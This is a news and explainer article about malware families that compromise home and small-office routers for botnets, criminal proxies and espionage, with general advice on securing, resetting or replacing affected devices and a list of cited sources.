A new wave of malicious programs is massively infecting home routers around the world, turning millions of devices into silent weapons in service of organized crime and state espionage operations.
The FBI, CISA, and cybersecurity agencies from a dozen countries have issued urgent alerts: the threat is real, it is active right now, and it may be occurring on your own network.
The weakest link could be in your home
By: Gabriel E Levy B
Every time someone turns on a laptop, sends a text message, or makes a video call, the traffic from that communication passes through a small device that few people check, update, or even remember exists: the home router.
For years, that device relegated to a corner of the living room was ignored both by users and by manufacturers themselves when it came to security.
Today, that collective negligence has generated one of the most serious cybersecurity crises in recent history.
Dozens of malware families have turned home and small-office routers into their preferred target.
The ecosystem of documented threats through early 2026 includes at least twelve active variants that infect, spy on, lease out, and in the most extreme cases, permanently destroy these devices.
The impact is global: in 2025, 47.1 million distributed denial-of-service attacks were recorded, an increase of 121% compared to the previous year, the majority carried out by compromised routers.
In December of that year, a single botnet reached 31.4 terabits per second of malicious traffic, breaking all historical records.
The key players in the threat
The most aggressive malware currently in circulation is called AISURU, also known as Airashi or Kimwolf. First identified in August 2024, this program — a direct descendant of the historical Mirai — controls more than 300,000 infected devices from brands such as Totolink, Zyxel, D-Link, Linksys, and T-Mobile.
In April 2025, its operators managed to infiltrate Totolink’s firmware update server, which allowed them to distribute malicious scripts to tens of thousands of routers simultaneously — that is, they turned the manufacturer’s own security mechanism into a mass infection vector.
Another high-impact actor is TheMoon, a malware known since 2014 that resurged forcefully in 2024 to feed a lucrative criminal proxy service called Faceless. This service billed more than 46 million dollars selling anonymous internet access through infected routers, before the FBI intervened in May 2025 with Operation Moonlander.
However, the threat did not disappear: a successor version called KadNap emerged, with around 14,000 compromised devices and a peer-to-peer network architecture practically impossible to dismantle using traditional methods.
The most disturbing scenario to date occurred in October 2023, when the Chalubo malware executed the so-called “Pumpkin Eclipse” operation: in just 72 hours, it permanently destroyed more than 600,000 routers belonging to a single US internet service provider. The devices were rendered completely inoperable and had to be physically replaced, disproportionately affecting rural communities with limited access to alternative services. The identity of the attacker remains unknown.
On the geopolitical front, the Chinese group Volt Typhoon maintained covert access to critical US infrastructure for at least five years using compromised home routers as invisible relay nodes.
How do they operate and why are they so hard to detect?
Routers are an ideal target precisely because they lack protection software.
They have no antivirus, they rarely have activity logs accessible to the average user, and in most home cases, no one monitors them.
Add to that years of accumulated unpatched vulnerabilities, default passwords that are never changed, and unnecessarily active remote management services.
The infection method varies depending on the malware, but follows three main routes: exploiting known vulnerabilities that the manufacturer will no longer patch because the device has reached end of life; taking advantage of weak or default credentials through brute force attacks; or, in the most sophisticated cases, compromising the firmware supply chain, as AISURU did with Totolink.
Once inside, the malware acts with extreme discretion: Volt Typhoon uses tools from the router’s own operating system to leave no traces; Chalubo runs entirely in memory and deletes its own files after execution; KadNap buries its command infrastructure within peer-to-peer network traffic, indistinguishable from normal BitTorrent usage.
Persistence has also become more sophisticated.
While older variants disappear with a simple device restart, the most recent threats survive even a factory reset. KadNap installs a scheduled task that downloads and executes the malware again at minute 55 of every hour. AyySSHush, which attacks ASUS routers, injects SSH keys using the manufacturer’s own configuration tools, creating a permanent backdoor that does not disappear even with the deepest reset.
How to protect yourself: concrete steps for users and businesses
The most urgent recommendation from cybersecurity agencies is also the most direct: replace any router that no longer receives security updates from its manufacturer. Using a device without active support is equivalent to leaving the front door unlocked. The FBI identified in 2025 thirteen Linksys models that are still being actively exploited and are no longer receiving updates; the list is constantly growing.
For devices that still have support, the most effective measures include: disabling remote management, the single configuration change with the greatest impact according to all official reports; disabling UPnP and WPS, protocols that new Mirai variants are actively exploiting; updating firmware regularly from the manufacturer’s official website; and changing administrator credentials to a strong, unique password.
CISA also recommends separating smart home devices (cameras, televisions, thermostats) on an independent guest network, so that if one is compromised it does not affect the rest.
What to do if the router is already infected
Detecting an infection is not always straightforward. The most common signs include unusual device heating, intermittent connection drops, abnormally slow speeds, DNS configuration changes the user did not make, or administrator credentials that suddenly stop working.
If an infection is suspected, the recommended protocol begins with a power cycle of the router: unplugging it from power for 30 seconds eliminates memory-resident malware in the majority of traditional variants.
However, that does not close the vulnerability.
The next step is a complete factory reset, usually by holding down the reset button for ten seconds, followed immediately by installing the latest available firmware, before reconnecting the device to the internet.
Reconfiguration must be done from scratch: new administrator credentials, a Wi-Fi network with a strong password, non-essential services disabled.
For ASUS routers affected by AyySSHush or WrtHug, where a factory reset may not be sufficient, ASUS has published a specific procedure that includes a firmware update and disabling AiCloud. If the router is literally unusable, as happened with Chalubo’s victims, the only solution is physical replacement.
The underlying problem is structural.
Hundreds of millions of routers around the world have reached the end of their useful life, their owners do not know it, and manufacturers have no legal obligation to warn them.
Meanwhile, the criminal ecosystem that exploits them generates tens of millions of dollars annually, and state actors use them to strategically position themselves within critical infrastructure in anticipation of potential future conflicts.
Security agencies can dismantle botnets, as the FBI did with KV-Botnet in 2024, but reinfection is a matter of months. The only lasting defense, experts warn, begins with the user who looks at that small device in a corner and decides, for the first time, to take it seriously.
In Conclusion
A dozen malware families — AISURU, TheMoon, Chalubo, Ballista, Volt Typhoon — infect millions of home routers around the world, turning them into weapons for massive attacks, criminal proxies, and state espionage.
Difficult to detect and increasingly resistant to rebooting, these programs exploit devices with missing updates and weak passwords.
The solution starts with replacing outdated routers, disabling remote management, and updating firmware regularly.
SOURCES AND REFERENCES
- FBI / IC3 — PSA250507: Cyber Criminal Proxy Services Exploiting End of Life Routers (May 2025). fbi.gov
- CISA — PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure, Advisory AA24-038A (2024). cisa.gov
- CISA — Secure by Design Alert: Security Design Improvements for SOHO Device Manufacturers (2024). cisa.gov
- Microsoft Security Blog — Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (May 2023). microsoft.com
- Lumen / Black Lotus Labs — The Pumpkin Eclipse: Identifying Chalubo Malware (2024). blog.lumen.com
- Lumen / Black Lotus Labs — The Dark Side of TheMoon (2024). blog.lumen.com
- Qianxin XLab — The Most Powerful Ever? Inside the 11.5Tbps-Scale Mega Botnet AISURU (2025). blog.xlab.qianxin.com
- The Hacker News — AISURU/Kimwolf Botnet Launches Record-Setting 31.4 Tbps DDoS Attack (February 2026). thehackernews.com
- The Hacker News — KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet (March 2026). thehackernews.com
- The Hacker News — Ballista Botnet Exploits Unpatched TP-Link Vulnerability (March 2025). thehackernews.com
- The Hacker News — WrtHug Exploits Six ASUS WRT Flaws to Hijack EoL Routers Worldwide (November 2025). thehackernews.com
- Bleeping Computer — Malware botnet bricked 600,000 routers in mysterious 2023 attack (2024). bleepingcomputer.com
- Bleeping Computer — TheMoon malware infects 6,000 ASUS routers in 72 hours for proxy service (2024). bleepingcomputer.com
- Krebs on Security — DDoS Botnet Aisuru Blankets US ISPs in Record DDoS (October 2025). krebsonsecurity.com
- SecurityScorecard — Operation WrtHug: The Global Espionage Campaign Hiding in Your Home Router (2025). securityscorecard.com
- Cato Networks CTRL — Ballista: New IoT Botnet Targeting Thousands of TP-Link Archer Routers (2025). catonetworks.com
- ASUS — Official Statement on Recent Reports Regarding Router Security (June 2025). asus.com
